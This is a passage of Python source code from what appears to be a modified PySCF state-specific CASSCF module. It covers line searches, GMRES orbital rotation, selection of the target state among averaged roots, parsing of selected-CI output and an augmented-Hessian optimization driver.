        gorb_update: function(u, ci) returning the packed orbital gradient.

    Returns:
        (u_new, gorb): rotation matrix and packed gradient at the chosen step.
    """
    log = logger.new_logger(casscf, verbose=None)
    u_new = casscf.update_rotate_matrix(dr, u)
    gorb = gorb_update(u_new, fcivec())
    norm_gorb = numpy.linalg.norm(gorb)
    log.debug(' before line search |g|=%5.3g', norm_gorb)
    # Already essentially converged: take the full step unchanged.
    if norm_gorb < 1e-04:
        return u_new, gorb
    alpha_min = 1
    norm_gorb_min = norm_gorb
    alpha = 0
    while alpha < 3:
        u_new = casscf.update_rotate_matrix(alpha*dr, u)
        gorb = gorb_update(u_new, fcivec())
        norm_gorb = numpy.linalg.norm(gorb)
        #log.debug("alpha = %5.4f norm_gorb = %12.6e", alpha, norm_gorb )
        if norm_gorb < norm_gorb_min:
            norm_gorb_min = norm_gorb
            alpha_min = alpha
        alpha += 0.1
    # Re-evaluate at the best alpha so u_new/gorb match the returned step.
    alpha = alpha_min
    u_new = casscf.update_rotate_matrix(alpha*dr, u)
    gorb = gorb_update(u_new, fcivec())
    norm_gorb = numpy.linalg.norm(gorb)
    log.info(" Best step length = %5.4f norm_gorb = %5.6f", alpha, norm_gorb )
    return u_new, gorb
def lineSearch(casscf, dr, fcivec, u, gorb_update):
    """Bracketing + bisection line search minimizing |g| along step dr.

    First scans alpha in [0, 2] with spacing 0.02, using a forward
    finite-difference derivative of |g| w.r.t. alpha to bracket minima,
    then bisects inside the bracket containing the smallest |g|.  Falls
    back to alpha = 1 when no bracket is found.

    Args:
        casscf: CASSCF object (supplies update_rotate_matrix).
        dr: packed orbital-rotation step direction.
        fcivec: callable returning the current CI vector.
        u: current rotation matrix the step is applied on top of.
        gorb_update: function(u, ci) returning the packed orbital gradient.

    Returns:
        (u_new, gorb): rotation matrix and packed gradient at the chosen step.
    """
    log = logger.new_logger(casscf, verbose=None)
    ncore = casscf.ncore
    ncas = casscf.ncas
    nocc = ncore+ncas
    u_new = casscf.update_rotate_matrix(dr, u)
    gorb = gorb_update(u_new, fcivec())
    norm_gorb = numpy.linalg.norm(gorb)
    log.debug(' before line search |g|=%5.3g', norm_gorb)
    # Already essentially converged: take the full step unchanged.
    if norm_gorb < 1e-06:
        return u_new, gorb
    def dgorb_dalpha(alpha):
        # Forward finite-difference derivative of |g| w.r.t. alpha.
        dalpha = 1e-07
        u_new = casscf.update_rotate_matrix((alpha+dalpha)*dr, u)
        gorb = gorb_update(u_new, fcivec())
        norm_gorb = numpy.linalg.norm(gorb)
        u_new = casscf.update_rotate_matrix(alpha*dr, u)
        gorb = gorb_update(u_new, fcivec())
        norm_gorb -= numpy.linalg.norm(gorb)
        return norm_gorb/dalpha
    alpha_upper = 0
    alpha_lower = 0
    alpha = 0.
    list_bound = []
    list_norm_min = []
    # Scan for sign changes of d|g|/dalpha to bracket minima of |g|.
    while alpha <= 2:
        dnorm = dgorb_dalpha(alpha)
        u_new = casscf.update_rotate_matrix(alpha*dr, u)
        gorb = gorb_update(u_new, fcivec())
        norm_gorb = numpy.linalg.norm(gorb)
        if alpha > 0.:
            if dnorm_old < 0 and dnorm > 0:
                list_bound.append([alpha_old, alpha])
                list_norm_min.append(norm_gorb)
            elif dnorm_old > 0 and dnorm < 0:
                list_bound.append([alpha, alpha_old])
                list_norm_min.append(norm_gorb)
        dnorm_old = dnorm
        alpha_old = alpha
        alpha += 0.02
    if (len(list_bound) != 0):
        # find the global minimum of norm_gorb
        from operator import itemgetter
        idx = min(enumerate(list_norm_min), key=itemgetter(1))[0]
        alpha_lower = list_bound[idx][0]
        alpha_upper = list_bound[idx][1]
        log.info(" global minimum of norm_gorb is in [%5.4f, %5.4f]", alpha_lower, alpha_upper)
        log.info(" perform bisection to find the best step length")
        alpha = 0.5*(alpha_upper + alpha_lower)
        dnorm = dgorb_dalpha(alpha)
        # Bisect on the sign of d|g|/dalpha until it is nearly zero.
        while abs(dnorm) > 1e-04:
            if dnorm < 0:
                alpha_lower = alpha
            else:
                alpha_upper = alpha
            alpha = 0.5*(alpha_upper + alpha_lower)
            dnorm = dgorb_dalpha(alpha)
            u_new = casscf.update_rotate_matrix(alpha*dr, u)
            gorb = gorb_update(u_new, fcivec())
            norm_gorb = numpy.linalg.norm(gorb)
            log.debug("alpha = %5.4f dnorm_gorb = %12.6f norm_gorb = %5.6f", alpha, dnorm, norm_gorb )
    else:
        log.info('there are no bounds => alpha = 1')
        alpha = 1
    # Final evaluation at the chosen step length.
    u_new = casscf.update_rotate_matrix(alpha*dr, u)
    gorb = gorb_update(u_new, fcivec())
    norm_gorb = numpy.linalg.norm(gorb)
    log.info(" Best step length = %5.4f norm_gorb = %5.6f", alpha, norm_gorb )
    return u_new, gorb
# orbital optimization using GMRES
def rotate_orb_gmres(casscf, mo, fcivec, fcasdm1, fcasdm2, eris, imacro, x0_guess=None,
                     conv_tol_grad=1e-4, max_stepsize=None, verbose=None):
    """One orbital-optimization step: solve H dr = -g with GMRES, then
    optionally line-search along dr.

    Args:
        casscf: CASSCF object carrying the GMRES options
            (gmres_conv_tol, gmres_max_cycle, is_gmres_precond,
            is_gmres_conv_dynm, is_line_search, gmres_hess_shift).
        mo: current MO coefficients.
        fcivec: callable returning the current CI vector.
        fcasdm1, fcasdm2: callables returning the active-space RDMs.
        eris: MO integral container for gen_g_hop.
        imacro: macro-iteration counter (unused here; kept for interface).
        x0_guess, conv_tol_grad, max_stepsize: kept for interface
            compatibility; x0_guess is overwritten with the gradient below.

    Returns:
        (u_new, g_orb): updated rotation matrix and packed orbital gradient.
    """
    log = logger.new_logger(casscf, verbose)
    # Fix: time.clock() was removed in Python 3.8; (cpu, wall) pair kept
    # since log.timer expects both.
    t3m = (time.process_time(), time.time())
    u = 1
    #print "fcasdm1"
    #print fcasdm1()
    g_orb, gorb_update, h_op, h_diag = \
        casscf.gen_g_hop(mo, u, fcasdm1(), fcasdm2(), eris)
    norm_gorb = numpy.linalg.norm(g_orb)
    log.debug(' before gmres |g|=%5.3g', norm_gorb)
    t3m = log.timer('gen h_op', *t3m)
    def precond(x):
        # Jacobi preconditioner using the (level-shifted) Hessian diagonal,
        # normalized to unit length.
        hdiagd = h_diag - casscf.gmres_hess_shift
        hdiagd[abs(hdiagd)<1e-8] = 1e-8
        x = x/hdiagd
        norm_x = numpy.linalg.norm(x)
        x *= 1/norm_x
        #if norm_x < 1e-2:
        # x *= 1e-2/norm_x
        return x
    jkcount = 0
    x0_guess = g_orb
    dr = 0
    #call GMRES
    bvec = -g_orb
    norm_gorb = numpy.linalg.norm(g_orb)
    tol = casscf.gmres_conv_tol
    if casscf.is_gmres_conv_dynm:
        # Inexact-Newton style: tighten the linear solve as |g| shrinks.
        tol = 0.25*norm_gorb
        log.info('genMinRes tol is dynamically changed: %5.3g', tol )
    if casscf.is_gmres_precond:
        dr = genMinRes(casscf, bvec, x0_guess, h_op, thresh=tol, maxiter=casscf.gmres_max_cycle, precondition=precond)
    else:
        dr = genMinRes(casscf, bvec, x0_guess, h_op, thresh=tol, maxiter=casscf.gmres_max_cycle)
    #call line search
    if casscf.is_line_search:
        u_new, g_orb = lineSearch_naive(casscf, dr, fcivec, u, gorb_update)
    else:
        #if numpy.amax(abs(dr)) > 0.05:
        # dr *= 0.1/numpy.amax(abs(dr))
        u_new = casscf.update_rotate_matrix(dr, u)
        g_orb = gorb_update(u_new, fcivec())
        norm_gorb = numpy.linalg.norm(g_orb)
    log.debug(' after gmres + linesearch |g|=%5.3g', norm_gorb)
    return u_new, g_orb
#Target state
def rota_rdms(mo_coeff, rdm1_AO):
    """Transform a 1-particle density matrix from the AO to the MO basis.

    Uses the pseudo-inverse of the MO coefficient matrix C:
    D_MO = C^+ . D_AO . (C^+)^T.
    """
    inv_coeff = numpy.linalg.pinv(mo_coeff)
    return inv_coeff.dot(rdm1_AO).dot(inv_coeff.T)
def read_sCI_output(ncas):
    """
    Function to convert the sCI output into a form usable in the SS-CASSCF

    Parses the selected-CI (Dice) output file 'output.dat' in the current
    working directory.  The parsing is tied to the exact text layout of
    that output ('State :' headers, 'PERTURBATION' terminator, fixed
    whitespace-separated columns) — TODO confirm against the Dice version
    in use.

    INPUT:
        ncas -- number of electrons in the active space
            (NOTE(review): currently unused by the body; kept for
            interface compatibility.)
    OUTPUT:
        civec -- vector of vectors of coefficients for each state
        config -- configurations associated with the above vectors
        spin_square_vals -- list of spin square for the read in states
    """
    # NOTE(review): the file handle is never closed; a commented-out legacy
    # Python-2-era parser that lived here was removed for clarity.
    file1 = open('output.dat', 'r')
    Lines = file1.readlines()
    save_line_flag=False
    save_lines=[]
    # intermediate step, we need the length of each CI vector for how we read
    # them in the next step
    ndets=0
    len_ci_vecs=[]
    spin_square_vals=[]
    #Set the number of determinants in the CI vector for each state
    for line in Lines:
        # We'll parse here and only use the shorter saved lines later
        if save_line_flag:
            save_lines.append(line.strip())
        # The line contains the state label
        if 'State' in line:
            # 7th whitespace-separated token on the 'State' line is <S^2>.
            spin_square_vals.append(float(line.split()[6]))
            #print("spin square for this one was:")
            #print(spin_square_vals)
            # If it's not the first state, store the length of the state
            #if line[len(line)-1]!='0':
            if "State : 0" not in line:
                #print("Not the first state")
                len_ci_vecs.append(ndets-1)
            # It is the first state, so let's start saving lines
            else:
                save_lines.append(line.strip())
                save_line_flag=True
            # Reset the counter since we've found a new state
            ndets=0
        # End of the printed states, save the length of last state and exit this
        # loop to stop saving further lines
        if "PERTURBATION" in line:
            # The last state block carries 4 trailing non-determinant lines.
            len_ci_vecs.append(ndets-4)
            break
        # incriment the counter for number of dets in a state
        ndets+=1
    #print("Found " + str(len(len_ci_vecs)) + " dets with lengths:")
    #print(len_ci_vecs)
    # Read & save the states.
    all_ci_vectors=[]
    all_ci_coeffs=[]
    i=0
    while i < len(save_lines):
        if 'State' in save_lines[i]:
            # Get the state index
            # NOTE(review): reads only the last character of the header,
            # so this assumes fewer than 10 states — confirm.
            state_index=int(save_lines[i][len(save_lines[i])-1])
            # Set the number of lines to expect
            ci_vec_ndets=len_ci_vecs[state_index]
            # Empty lists to hold the read coefficients
            state_ci_coeffs=[]
            state_ci_vecs=[]
            for j in range(ci_vec_ndets):
                # Stores the coefficient and the remainder of the active space
                # vector into it's own list
                #print(save_lines[i+j+1])
                state_ci_coeffs.append(float((save_lines[i+j+1].split())[1]))
                state_ci_vecs.append(save_lines[i+j+1].split()[2:])
            all_ci_coeffs.append(state_ci_coeffs)
            all_ci_vectors.append(state_ci_vecs)
        # Not the most efficient way to do this, but it is just counting so.....
        i+=1
    return all_ci_coeffs, all_ci_vectors, spin_square_vals
def extract_spin_state_sCI(istate, civec, config):
    """Estimate <S^2> for state ``istate`` from its leading sCI determinant.

    The number of unpaired electrons is taken as |n_alpha - n_beta| in the
    leading (first) configuration of the state, giving S = |n_a - n_b|/2
    and the return value S*(S+1).

    Args:
        istate: index of the state of interest.
        civec: per-state CI coefficients (unused; kept for interface
            compatibility with callers).
        config: per-state list of determinant occupation sequences, each a
            sequence of orbital labels ('2', 'a', 'b', '0').

    Returns:
        float: S*(S+1) derived from the leading determinant.
    """
    # Cleaned up: dead commented-out alternatives removed, single return path.
    leading = config[istate][0]
    n_unpaired = abs(leading.count('a') - leading.count('b'))
    spin = 0.5 * n_unpaired
    return spin * (spin + 1.0)
def select_target_state(casscf, mo_coeff, fcivec, e_tot, envs, target_state, nroots, eris):
    """Pick the state-averaged root best matching the tracked target state.

    For each root a selection metric W is built from (configurable via
    casscf.is_only_* flags): the squared energy distance to envs['omega'],
    the squared orbital-gradient norm, the density-matrix distance to the
    target 1-RDM, and optionally the dipole distance.  Only roots whose
    <S^2> matches casscf.target_state_spin (within 0.1) are candidates; the
    candidate with the smallest |W| wins.

    Args:
        casscf: CASSCF object carrying the selection flags and fcisolver.
        mo_coeff: current MO coefficients.
        fcivec: list of CI vectors, one per root.
        e_tot: list of total energies, one per root.
        envs: dict providing 'omega' (target energy) and 'rdm1Target_AO'.
        target_state: current target-state index (fallback if no candidate
            beats it).
        nroots: number of roots to examine.
        eris: MO integral container passed to gen_g_hop.

    Returns:
        (target_state, dipole): chosen root index and its dipole vector.
    """
    log = logger.new_logger(casscf, verbose=None)
    norb = mo_coeff.shape[1]
    ncore = casscf.ncore
    ncas = casscf.ncas
    nocc = ncore+ncas
    omega = envs['omega']
    rdm1Target_AO = envs['rdm1Target_AO'] # in AOs
    d_target = scf.hf.dip_moment(mol=casscf.mol, dm=rdm1Target_AO)
    #reading sCI information from output.dat
    civec = [] #dump variable for sCI
    config = [] # dump variable for sCI
    spin_square_states = []
    if(casscf.is_use_sCI):
        civec, config, spin_square_states = read_sCI_output(ncas)
    def eval_Hsqr(s):
        # Squared norm of the packed orbital gradient for root s
        # (energy-variance-like stationarity measure).
        #wfn_norm = numpy.sqrt(numpy.sum(numpy.matmul(fcivec[s], fcivec[s].T)))
        casdm1, casdm2 = casscf.fcisolver.make_rdm12(fcivec[s], ncas, casscf.nelecas)
        #casdm1 = casscf.fcisolver.make_rdm1(fcivec[s], ncas, casscf.nelecas)
        #casdm2 = casscf.fcisolver.make_rdm2(fcivec[s], ncas, casscf.nelecas)
        g, gorb_update = gen_g_hop(casscf, mo_coeff, 1, casdm1, casdm2, eris, get_g=True)
        gorb = casscf.pack_uniq_var(g-g.T)
        Hsqr = numpy.sum(numpy.square(gorb)) #/ wfn_norm
        gorbNorm = numpy.linalg.norm(gorb)
        return Hsqr, gorbNorm
    rdm1Target = rota_rdms(mo_coeff, rdm1Target_AO)
    W_list = []
    s_list = []
    d_list = []
    for s in range(nroots):
        if not casscf.is_use_sCI:
            ss = casscf.fcisolver.spin_square(fcivec[s], ncas, casscf.nelecas)[0]
        else:
            ss = extract_spin_state_sCI(s, civec, config)
            # Pick out of the read in spin square options to go after the right
            # spin state
            ss = spin_square_states[s]
        casdm1, casdm2 = casscf.fcisolver.make_rdm12(fcivec[s], ncas, casscf.nelecas)
        rdm1_MO, rdm2_MO = addons._make_rdm12_on_mo(casdm1, casdm2, ncore, ncas, norb)
        ddmNorm = 1./ncas * numpy.linalg.norm(rdm1_MO - rdm1Target)
        print()
        print("dipole for Root", s)
        rdm1_AO = addons.make_rdm1(casscf, mo_coeff, fcivec[s])
        d = scf.hf.dip_moment(mol=casscf.mol, dm=rdm1_AO, print_dip=False)
        dNorm = numpy.linalg.norm(d - d_target) / (5.*ncas)
        d_list.append(d)
        # Default metric; the is_only_* flags below override it entirely.
        W = numpy.square(omega - e_tot[s]) + eval_Hsqr(s)[0] + ddmNorm
        if casscf.is_target_dipole:
            W += dNorm
        if casscf.is_only_ddm:
            W = ddmNorm
        elif casscf.is_only_W:
            W = numpy.square(omega - e_tot[s]) + eval_Hsqr(s)[0]
        elif casscf.is_only_H2:
            W = eval_Hsqr(s)[0]
        elif casscf.is_only_E:
            W = numpy.square(omega - e_tot[s])
        elif casscf.is_only_dipole:
            dNorm = numpy.linalg.norm(d - d_target) / (5.*ncas)
            W = dNorm
        elif casscf.is_ddm_and_dipole:
            W = ddmNorm + dNorm
        #print
        log.info('Root %d : Total = %.6f (omega-E)^2 = %.6f Hsqr = %.6f ddmNorm = %.6f dNorm = %.6f S^2 = %.6f',
                 s, W, numpy.square(omega - e_tot[s]), eval_Hsqr(s)[0], ddmNorm, dNorm, ss)
        #d *= nist.AU2DEBYE
        #log.note('Dipole moment(X, Y, Z, Debye): %8.5f, %8.5f, %8.5f', *d)
        print()
        # Only roots of the requested spin are eligible.
        ss_target = 0.5*casscf.target_state_spin*(0.5*casscf.target_state_spin+1)
        if abs(ss - ss_target) < 1e-1:
            W_list.append(W)
            s_list.append(s)
        #print "Natural orbital analysis: "
        if not casscf.is_use_sCI:
            nat_orbs = casscf.cas_natorb(mo_coeff, fcivec[s])
        #print
        #print "CI vector"
        #print fcivec[s]
        #print 'wfn_norm = ', wfn_norm
        #print
    # NOTE(review): raises IndexError if no root matched the target spin.
    assert(len(W_list) == len(s_list))
    W_min = W_list[0]
    for i in range(len(W_list)):
        #print 'w_min', W_min, W_list[0], target_state
        if abs(W_list[i]) <= abs(W_min):
            target_state = s_list[i]
            W_min = W_list[i]
    return target_state, d_list[target_state]
#not used# def eval_energy(alpha, dalpha=0): # objective function
#not used# alpha += dalpha
#not used# u_new = casscf.update_rotate_matrix(alpha*dr, u)
#not used# mo_coeff_new = casscf.rotate_mo(mo_coeff, u_new)
#not used# energy_core = casscf.energy_nuc()
#not used# h1e_ao = casscf.get_hcore()
#not used# if(ncore > 0):
#not used# mo_core = mo_coeff_new[:,:ncore]
#not used# core_dm = numpy.dot(mo_core, mo_core.T) * 2
#not used# energy_core += numpy.einsum('ij,ji', core_dm, casscf.get_hcore())
#not used# energy_core += numpy.einsum('ij,ji', core_dm, casscf.get_veff(casscf.mol)) * .5
#not used# h1e_ao += casscf.get_veff(casscf.mol, core_dm)
#not used#
#not used# h1e = reduce(numpy.dot, (mo_coeff_new[:,ncore:nocc].T, h1e_ao, mo_coeff_new[:,ncore:nocc]))
#not used# eri = ao2mo.kernel(casscf.mol, mo_coeff_new[:,ncore:nocc], compact=False)
#not used# eri = numpy.reshape(eri, (ncas, ncas, ncas, ncas))
#not used#
#not used# #rdm1, rdm2 = make_rdm12(casscf, s)
#not used# casdm1 = casscf.fcisolver.make_rdm1(fcivec(), ncas, casscf.nelecas)
#not used# casdm2 = casscf.fcisolver.make_rdm2(fcivec(), ncas, casscf.nelecas)
#not used# H_1e = numpy.einsum('ik,ik->', casdm1, h1e) #[:ncas,:ncas]
#not used# H_2e = numpy.einsum('ijkl,ijkl->', casdm2, eri) # 2. W_2e [:ncas,:ncas,:ncas,:ncas]
#not used#
#not used# return energy_core + H_1e + 0.5 * H_2e
#not used#
def eval_energy(mol, h1e_ao, enuc, mo_coeff, ncas, casdm1, casdm2): # objective function
    """Active-space electronic energy E = enuc + Tr[D1 h] + 1/2 Tr[D2 (pq|rs)].

    Args:
        mol: Mole object (used by ao2mo for the two-electron integrals).
        h1e_ao: one-electron Hamiltonian in the AO basis (core-potential
            already folded in by the caller, per the commented code below).
        enuc: nuclear-repulsion (plus frozen-core) energy constant.
        mo_coeff: MO coefficients; only the first ncas columns are used.
        ncas: number of active orbitals.
        casdm1, casdm2: active-space 1- and 2-particle density matrices.

    Returns:
        float: total energy for the given densities and orbitals.
    """
    #mo_coeff = casscf.mo_coeff
    #energy_core = mol.energy_nuc()
    #h1e_ao = casscf.get_hcore()
    #if(ncore > 0):
    # mo_core = mo_coeff[:,:ncore]
    # core_dm = numpy.dot(mo_core, mo_core.T) * 2
    # energy_core += numpy.einsum('ij,ji', core_dm, casscf.get_hcore())
    # energy_core += numpy.einsum('ij,ji', core_dm, casscf.get_veff(casscf.mol)) * .5
    # h1e_ao += casscf.get_veff(casscf.mol, core_dm)
    # No frozen core handled here: the active window is columns [0, ncas).
    ncore = 0
    nocc = ncas
    h1e = reduce(numpy.dot, (mo_coeff[:,ncore:nocc].T, h1e_ao, mo_coeff[:,ncore:nocc]))
    eri = ao2mo.kernel(mol, mo_coeff[:,ncore:nocc], compact=False)
    eri = numpy.reshape(eri, (ncas, ncas, ncas, ncas))
    #rdm1, rdm2 = make_rdm12(casscf, s)
    #casdm1 = casscf.fcisolver.make_rdm1(fcivec(), ncas, casscf.nelecas)
    #casdm2 = casscf.fcisolver.make_rdm2(fcivec(), ncas, casscf.nelecas)
    H_1e = numpy.einsum('ik,ik->', casdm1, h1e) #[:ncas,:ncas]
    H_2e = numpy.einsum('ijkl,ijkl->', casdm2, eri) # 2. W_2e [:ncas,:ncas,:ncas,:ncas]
    # NOTE(review): leftover debug print — consider removing or demoting to
    # a logger.debug call.
    print("H_1e", H_1e, H_2e)
    return enuc + H_1e + 0.5 * H_2e
def genMOandCI(mc, mol, civec=None, mo_coeff=None):
    """Print the CI expansion of an MCSCF wavefunction as occupation strings.

    Every determinant is printed as an alpha occupation string and a beta
    occupation string (each ncas characters, orbital 0 leftmost) together
    with its CI coefficient.  Only coefficients with |c| > 0.1 are listed.

    Args:
        mc: CASCI/CASSCF object; supplies ncas, nelecas and the defaults
            for civec and mo_coeff.
        mol: kept for call-signature compatibility (not used directly).
        civec: CI-coefficient matrix, alpha strings x beta strings.
            Defaults to mc.ci.
        mo_coeff: MO coefficients. Defaults to mc.mo_coeff.
    """
    if mo_coeff is None:
        mo_coeff = mc.mo_coeff
    if civec is None:
        civec = mc.ci
    ncas = mc.ncas
    neleca, nelecb = mc.nelecas
    nocc = ncas
    # Norm of the CI vector, printed as a sanity check; the vector itself is
    # deliberately not rescaled.
    print('||civec|| = ', numpy.sqrt(numpy.sum(numpy.matmul(civec, civec.T))))

    def gen_string():
        """Return [alpha_string, beta_string, coefficient] for each determinant."""
        def occ_strings(nelec):
            # fci.cistring.make_strings yields occupation bit masks.  Reverse
            # the binary digits of each mask (skipping the '0b' prefix) so
            # orbital 0 comes first, then right-pad with '0' to ncas chars.
            strs = []
            for a in (bin(x) for x in fci.cistring.make_strings(range(ncas), nelec)):
                b = a[len(a) - 1]
                for i in range(0, len(a) - 1):
                    j = len(a) - 2 - i
                    if j > 1:
                        b += a[j]
                if len(b) < ncas:
                    b += '0' * (ncas - len(b))
                strs.append(b)
            return strs

        stringa = occ_strings(neleca)
        stringb = occ_strings(nelecb)
        combo = []
        # civec rows index alpha strings, columns index beta strings.
        for ib in range(len(stringb)):
            for ia in range(len(stringa)):
                combo.append([stringa[ia], stringb[ib], civec[ia, ib]])
        return combo

    string = gen_string()
    print()
    print()
    print(" ALPHA | BETA | COEFFICIENT")
    # Fixed: the py2 "print x," no-newline idiom was mangled in the py3
    # conversion (each fragment printed its own newline and a bare `print`
    # expression did nothing), so the ruler and the table rows were broken
    # across lines.  Emit each on a single line instead.
    sys.stdout.write("-" * nocc)
    print("-|-", end="")
    sys.stdout.write("-" * nocc)
    print("-|-", end="")
    sys.stdout.write("-" * 20)
    print()
    for sa, sb, coeff in string:
        if abs(coeff) > 0.1:
            print(sa, "|", sb, "|", coeff)
    print("..... DONE WITH GENERAL CI COMPUTATION ..... ")
# END Lan's SS-CASSCF
def rotate_orb_cc(casscf, mo, fcivec, fcasdm1, fcasdm2, eris, x0_guess=None,
                  conv_tol_grad=1e-4, max_stepsize=None, verbose=None):
    """Generator driving the augmented-hessian orbital-rotation micro steps.

    Solves the AH eigenproblem with a Davidson-type co-iterative solver
    (ciah.davidson_cc) and yields ``(u, g_orb, njk, dxi)`` at each keyframe:
    the accumulated rotation matrix, the orbital gradient of the last
    keyframe, the cumulative Hessian/gradient evaluation count and the last
    step (reused by the caller as the next ``x0_guess``).

    fcivec/fcasdm1/fcasdm2 are zero-argument callables so the CI vector and
    CAS density matrices are evaluated lazily.

    NOTE(review): ``time.clock()`` was removed in Python 3.8 -- this module
    needs ``time.process_time()`` (or pyscf's clock helper) to run on
    modern interpreters.
    """
    log = logger.new_logger(casscf, verbose)
    if max_stepsize is None:
        max_stepsize = casscf.max_stepsize

    t3m = (time.clock(), time.time())
    u = 1
    # g_orb: orbital gradient; gorb_update: recompute gradient for a given
    # rotation; h_op/h_diag: Hessian-vector product and Hessian diagonal.
    g_orb, gorb_update, h_op, h_diag = \
        casscf.gen_g_hop(mo, u, fcasdm1(), fcasdm2(), eris)
    ngorb = g_orb.size
    g_kf = g_orb
    norm_gkf = norm_gorb = numpy.linalg.norm(g_orb)
    log.debug(' |g|=%5.3g', norm_gorb)
    t3m = log.timer('gen h_op', *t3m)

    if norm_gorb < conv_tol_grad*.3:
        # Already converged: yield the identity rotation and stop.
        u = casscf.update_rotate_matrix(g_orb*0)
        yield u, g_orb, 1, x0_guess
        return

    def precond(x, e):
        # Level-shifted diagonal preconditioner for the Davidson iterations;
        # the result is normalized so step-size control stays with the caller.
        hdiagd = h_diag-(e-casscf.ah_level_shift)
        hdiagd[abs(hdiagd)<1e-8] = 1e-8
        x = x/hdiagd
        norm_x = numpy.linalg.norm(x)
        x *= 1/norm_x
        #if norm_x < 1e-2:
        #    x *= 1e-2/norm_x
        return x

    jkcount = 0
    if x0_guess is None:
        x0_guess = g_orb
    imic = 0                  # accepted micro steps
    dr = 0                    # accumulated rotation since the last keyframe
    ikf = 0                   # micro steps since the last keyframe
    g_op = lambda: g_orb

    for ah_end, ihop, w, dxi, hdxi, residual, seig \
            in ciah.davidson_cc(h_op, g_op, precond, x0_guess,
                                tol=casscf.ah_conv_tol, max_cycle=casscf.ah_max_cycle,
                                lindep=casscf.ah_lindep, verbose=log):
        # residual = v[0] * (g+(h-e)x) ~ v[0] * grad
        norm_residual = numpy.linalg.norm(residual)
        if (ah_end or ihop == casscf.ah_max_cycle or # make sure to use the last step
            ((norm_residual < casscf.ah_start_tol) and (ihop >= casscf.ah_start_cycle)) or
            (seig < casscf.ah_lindep)):
            imic += 1
            dxmax = numpy.max(abs(dxi))
            # Clamp the proposed rotation so max(|x|) <= max_stepsize.
            if dxmax > max_stepsize:
                scale = max_stepsize / dxmax
                log.debug1('... scale rotation size %g', scale)
                dxi *= scale
                hdxi *= scale
            else:
                scale = None

            # First-order gradient update along the accepted step.
            g_orb = g_orb + hdxi
            dr = dr + dxi
            norm_gorb = numpy.linalg.norm(g_orb)
            norm_dxi = numpy.linalg.norm(dxi)
            norm_dr = numpy.linalg.norm(dr)
            log.debug(' imic %d(%d) |g[o]|=%5.3g |dxi|=%5.3g '
                      'max(|x|)=%5.3g |dr|=%5.3g eig=%5.3g seig=%5.3g',
                      imic, ihop, norm_gorb, norm_dxi,
                      dxmax, norm_dr, w, seig)

            ikf += 1
            if ikf > 1 and norm_gorb > norm_gkf*casscf.ah_grad_trust_region:
                # Gradient grew out of the trust region: undo the last step
                # and hand control back to the caller.
                g_orb = g_orb - hdxi
                dr -= dxi
                #norm_gorb = numpy.linalg.norm(g_orb)
                log.debug('|g| >> keyframe, Restore previouse step')
                break

            elif (norm_gorb < conv_tol_grad*.3):
                break

            elif (ikf >= max(casscf.kf_interval, -numpy.log(norm_dr+1e-7)) or
                  # Insert keyframe if the keyframe and the esitimated grad are too different
                  norm_gorb < norm_gkf/casscf.kf_trust_region):
                ikf = 0
                u = casscf.update_rotate_matrix(dr, u)
                t3m = log.timer('aug_hess in %d inner iters' % imic, *t3m)
                yield u, g_kf, ihop+jkcount, dxi

                t3m = (time.clock(), time.time())
# TODO: test whether to update h_op, h_diag to change the orbital hessian.
# It leads to the different hessian operations in the same davidson
# diagonalization procedure.  This is generally a bad approximation because it
# results in ill-defined hessian eigenvalue in the davidson algorithm.  But in
# certain cases, it is a small perturbation that help the mcscf optimization
# algorithm move out of local minimum
#                h_op, h_diag = \
#                        casscf.gen_g_hop(mo, u, fcasdm1(), fcasdm2(), eris)[2:4]
                # Exact gradient at the keyframe rotation.
                g_kf1 = gorb_update(u, fcivec())
                jkcount += 1

                norm_gkf1 = numpy.linalg.norm(g_kf1)
                norm_dg = numpy.linalg.norm(g_kf1-g_orb)
                log.debug(' |g|=%5.3g (keyframe), |g-correction|=%5.3g',
                          norm_gkf1, norm_dg)
                #
                # Special treatment if out of trust region
                #
                if (norm_dg > norm_gorb*casscf.ah_grad_trust_region and
                    norm_gkf1 > norm_gkf and
                    norm_gkf1 > norm_gkf*casscf.ah_grad_trust_region):
                    log.debug(' Keyframe |g|=%5.3g |g_last| =%5.3g out of trust region',
                              norm_gkf1, norm_gorb)
                    # Slightly moving forward, not completely restoring last step.
                    # In some cases, the optimization moves out of trust region in the first micro
                    # iteration. The small forward step can ensure the orbital changes in the
                    # current iteration.
                    dr = -dxi * .5
                    g_kf = g_kf1
                    break

                t3m = log.timer('gen h_op', *t3m)
                # Reset the keyframe state to the exact gradient.
                g_orb = g_kf = g_kf1
                norm_gorb = norm_gkf = norm_gkf1
                dr[:] = 0

    # Final rotation (including any partial dr) handed back to the macro loop.
    u = casscf.update_rotate_matrix(dr, u)
    yield u, g_kf, ihop+jkcount, dxi
def kernel(casscf, mo_coeff, tol=1e-7, conv_tol_grad=1e-03,
           ci0=None, callback=None, verbose=logger.NOTE, dump_chk=True):
    '''quasi-newton CASSCF optimization driver

    Macro loop: solve the CASCI problem at the current orbitals, then run
    orbital-rotation micro iterations -- either a GMRES solver
    (casscf.is_use_gmres) or the augmented-hessian generator rotate_orb_cc --
    until the energy change, orbital gradient and change of the active-space
    1-RDM are all below threshold.

    Returns:
        conv, e_tot, e_cas, fcivec, mo, mo_energy
    '''
    log = logger.new_logger(casscf, verbose)
    cput0 = (time.clock(), time.time())
    log.debug('Start 1-step CASSCF')
    if callback is None:
        callback = casscf.callback

    mo = mo_coeff
    nmo = mo_coeff.shape[1]
    #TODO: lazy evaluate eris, to leave enough memory for FCI solver
    eris = casscf.ao2mo(mo)

    # "cycle" is a geometry-optimization counter exported through the
    # environment by the driver script; on later geometries the previous
    # geometry's density matrix is kept for state tracking.
    if os.environ.get("cycle") is not None:
        #if (int(os.environ["cycle"])+1) == 1:
        #    conv_tol_grad = 5e-03
        #    tol = 5e-04
        #    logger.info(casscf, 'Lan sets conv_tol to %g', tol)
        #    logger.info(casscf, 'Lan sets conv_tol_grad to %g', conv_tol_grad)
        if (int(os.environ["cycle"])+1) > 1:
            if(casscf.is_select_state):
                rdm1_pregeom_AO = addons.make_rdm12(casscf, mo, ci0) #, rdm2Target_AO
                #print "rdm1_pregeom_AO"
                #print rdm1_pregeom_AO

    e_tot, e_cas, fcivec = casscf.casci(mo, ci0, eris, log, locals())
    if casscf.ncas == nmo and not casscf.internal_rotation:
        # Active space spans all orbitals: no rotation possible, the CASCI
        # result is already final.
        if casscf.canonicalization:
            log.debug('CASSCF canonicalization')
            mo, fcivec, mo_energy = casscf.canonicalize(mo, fcivec, eris,
                                                        casscf.sorting_mo_energy,
                                                        casscf.natorb, verbose=log)
        else:
            mo_energy = None
